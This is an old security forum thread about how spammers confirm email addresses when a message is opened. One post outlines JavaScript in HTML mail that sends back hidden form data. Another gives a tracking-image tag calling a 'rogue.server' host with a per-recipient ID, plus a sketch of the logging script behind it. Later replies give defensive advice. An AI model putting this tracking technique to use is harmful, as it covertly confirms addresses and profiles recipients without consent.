How spammers can confirm your email address without you even responding.

View Poll Results: Will the US attack Iran

Voters
9. You may not vote on this poll
  • Yes

    5 55.56%
  • No

    4 44.44%
Results 1 to 8 of 8

Thread: How spammers can confirm your email address without you even responding.

  1. #1

    Exclamation How spammers can confirm your email address without you even responding.

    I have found a way for a spammer to confirm an email address is valid without the user even responding to it. Here is how it is done. An email with an html form with hidden values is sent to the unfortunate reciepient. A JavaScript is inserted to acquire information such as the screen dimmensions, browser and operating version. The email software the puts the email and all the Javascript information plus the email address into hidden fields. This JavaScript is loaded when the email is opened and the JavaScript function sends the html form back to the spammer. Then on the spammer side, he uses Perl to get statistics such as IP Adress and UserID. VIOLA! THE SPAMMER AS A CONFIRMED EMAIL ADDRESS AND IMPORTANT DEMOGRAPHIC INFORMATION JUST RIPE FOR EXPOILTATION.


    The Moral of the Story::::
    DON'T HAVE JAVASCRIPT ENABLED ON YOUR EMAIL!!!!

  2. #2
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    I have found a way for a spammer to confirm an email address is valid without the user even responding to it.
    It's been used and abused before.. You're not the first one to think of this.

    Why use javascript? It's, by default, turned off in todays mailclients..

    Something like a remote image will do the trick quite nicely too..

    Code:
    <img src=http://rogue.server/pic.php?id=123456787>
    Generate a new ID for every email send.. Use a database or something to log ID->email address relation.. Create pic.php to log the ID (and everything else you want) and make it return a GIF/JPG..

    Unless ofcourse remote images are turned off in the mailclient the user only has to open/read the email.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  3. #3
    Senior Member therenegade's Avatar
    Join Date
    Apr 2003
    Posts
    400
    Wouldn't the better moral be 'Don't open email from people you don't know'?

  4. #4
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    Originally posted here by therenegade
    Wouldn't the better moral be 'Don't open email from people you don't know'?
    Good point.. But... A lot of virusses/worms come from friends and family.. Sometimes spam too (faked email from: address)..
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  5. #5
    Senior Member therenegade's Avatar
    Join Date
    Apr 2003
    Posts
    400
    Originally posted here by SirDice
    But... A lot of virusses/worms come from friends and family.. Sometimes spam too (faked email from: address)..
    Which is when we fall back on to the "Don't open attachments you're not really sure of' rule..admittedly,this fails in lieu of the average home user...as does enforcing a strict security policy(I don't think I've seen too many who surf from non-admin accounts...actually,I think a lot of them don't even know that there're other types of accounts...or that they're on an admin account)..unfortunately it's what's happening in a lot of homes all over today..which is why we go back to 'Get an AV and keep it updated.'

  6. #6
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    The average home user is also the reason why remote images and javascript are turned off by default
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  7. #7
    Senior Member treanglin's Avatar
    Join Date
    Dec 2003
    Posts
    111
    The best way to view all e-mails , in my experience, is in a text only mode. All of the mail clients I use convert html messages to text only mesages. and then they give you the option to view the html version if you want.
    "Do you know why the system is slow?" they ask

    "It's probably something to do with..." I look up today's excuse ".. clock speed"
    -BOFH

  8. #8
    Senior Member therenegade's Avatar
    Join Date
    Apr 2003
    Posts
    400
    True SirDice...but the average user ever so often has the tendency to try and enable it for percieved 'added functionality'(read as chat,pr0n whatever )

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •